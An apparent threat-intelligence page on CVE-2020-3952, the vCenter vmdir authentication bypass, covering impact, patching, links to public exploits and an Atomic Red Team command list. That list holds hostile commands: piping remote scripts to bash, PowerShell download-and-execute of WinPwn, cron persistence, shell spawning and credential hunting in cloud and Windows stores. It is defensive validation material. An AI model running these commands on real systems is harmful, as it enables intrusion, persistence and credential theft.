CVE-2020-3952
Overview
This vulnerability is an authentication bypass caused by improper access control enforcement within the vmdir component of VMware vCenter Server's Platform Services Controller (PSC). Specifically, vmdir fails to correctly restrict access to sensitive LDAP operations, allowing unauthorized requests to bypass normal authentication checks. The flaw resides in the handling of LDAP requests processed by the embedded or external PSC, leading to a broken access control condition.
Vulnerability Description
Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.
Impact
An attacker without any authentication or user interaction can exploit this vulnerability to gain unauthorized access to sensitive directory services within vCenter Server. This access enables them to perform privileged actions such as retrieving or modifying authentication and authorization data, potentially leading to privilege escalation, exposure of confidential information, and lateral movement within the enterprise environment. The compromise of vmdir undermines the security of the entire VMware infrastructure managed by the affected vCenter Server instance.
Solution
VMware has addressed this vulnerability in the security advisory VMSA-2020-0006. Users of VMware vCenter Server version 6.7 should apply the patches provided by VMware as detailed in the advisory at https://www.vmware.com/security/advisories/VMSA-2020-0006.html. The advisory includes updated software packages that correct the access control implementation in the vmdir component. Administrators should follow VMware's instructions precisely to ensure complete remediation of the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability associated with VMware vCenter Server arises from improper access control mechanisms within the vmdir component, which is integral to both embedded and external Platform Services Controllers (PSC). This flaw allows unauthorized users to gain access to sensitive information and perform actions that should be restricted. Specifically, the issue lies in the way the system handles authentication and authorization, potentially allowing attackers to bypass security measures that are meant to protect critical data and functionalities. The failure to enforce proper access controls can lead to significant security breaches, particularly in environments where vCenter Server is used to manage virtualized infrastructure.
Attack vectors for exploiting this vulnerability are varied and can be executed by both external and internal actors. An attacker with network access could leverage this flaw to gain unauthorized access to the vmdir service, which manages directory services for VMware environments. Once access is obtained, an attacker could manipulate or exfiltrate sensitive data, such as user credentials or configuration settings. Additionally, the vulnerability could be exploited to escalate privileges within the virtual environment, allowing the attacker to gain control over virtual machines and other critical resources. Given the central role of vCenter Server in managing virtualized infrastructures, the potential for widespread disruption and data compromise is significant.
The real-world impact of this vulnerability can be profound, especially for organizations that rely heavily on VMware products for their IT operations. A successful exploitation could lead to unauthorized access to sensitive data, including personally identifiable information (PII) and proprietary business information. This could result in severe business risks, including financial losses, reputational damage, and regulatory penalties. Organizations may face operational disruptions as they respond to security incidents, and the fallout from a breach could lead to long-term trust issues with clients and partners. Furthermore, the high CVSS score of 9.8 indicates that the vulnerability poses a critical risk, necessitating immediate attention from security teams.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating VMware vCenter Server to the latest version is essential, as vendors often release patches to address known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations and access controls. Monitoring logs for unusual access patterns or unauthorized attempts to access the vmdir service can provide early warning signs of exploitation attempts. Furthermore, implementing strict access control policies and ensuring that only authorized personnel have access to sensitive components can significantly reduce the risk of exploitation.
In conclusion, the access control vulnerability in VMware vCenter Server represents a serious threat to organizations utilizing this technology. The potential for unauthorized access and subsequent exploitation underscores the importance of robust security practices. By prioritizing timely updates, conducting regular security assessments, and enforcing strict access controls, organizations can mitigate the risks associated with this vulnerability and protect their virtualized environments from potential threats. The evolving landscape of cybersecurity threats necessitates a proactive approach to vulnerability management, ensuring that organizations remain vigilant against both known and emerging risks.
CSURFACE threat intelligence has detected a marked escalation in activity exploiting CVE-2020-3952, with new telemetry indicating the vulnerability is being actively targeted in the wild. Although the EPSS score shows a slight decline, this does not reflect a reduction in exploitation attempts but rather a recalibration based on broader metrics. The emergence of additional proof-of-concept exploits and exploit checkers on public repositories has likely contributed to increased adversary interest and capability to weaponize this flaw. While ransomware campaigns have not been definitively linked to this vulnerability, the association with the Akira group underscores the potential for its use in targeted intrusions. For defenders, this development signals an elevated threat posture requiring heightened vigilance, as exploitation attempts are becoming more frequent and accessible to a wider range of attackers. Consequently, the risk level remains critical due to the vulnerability’s high severity and the growing exploitation momentum observed by our sensors.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Vcenter Server | 6.7 |
cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
VMware vCenter Server vmdir Authentication Bypass
auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
|
Hynek Petrak, JJ Lehmann, Ofri Ziv +1 | Unknown | - | View |
|
VMware vCenter Server vmdir Information Disclosure
auxiliary/gather/vmware_vcenter_vmdir_ldap
|
Hynek Petrak, wvu | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| VMware vCenter Server 6.7 - Authentication Bypass | Photubias | webapps | multiple | - | View |
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
guardicore/vmware_vcenter_cve_2020_3952
Exploit for CVE-2020-3952 in vCenter 6.7
|
guardicore | 275 | 60 | 2020-04-16 | View |
|
bb33bb/CVE-2020-3952
Working Exploit PoC for VMWare vCenter Server (CVE-2020-3952) - Reverse Bind Shell
|
bb33bb | 7 | 2 | 2020-04-16 | View |
|
chronoloper/CVE-2020-3952
Vuln Check
|
chronoloper | 4 | 2 | 2020-04-15 | View |
|
Fa1c0n35/vmware_vcenter_cve_2020_3952
Exploit for CVE-2020-3952 in vCenter 6.7 https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
|
Fa1c0n35 | 3 | 3 | 2020-04-19 | View |
|
gelim/CVE-2020-3952
VMWare vmdir missing access control exploit checker
|
gelim | 2 | 3 | 2020-04-17 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-3952 |
| vmware.com |
GitHub CVE
x_refsource_MISC
|
https://www.vmware.com/security/advisories/VMSA-2020-0006 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/157896/VMware-vCenter-Server-6.7-Authentication-Bypass.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-3952 |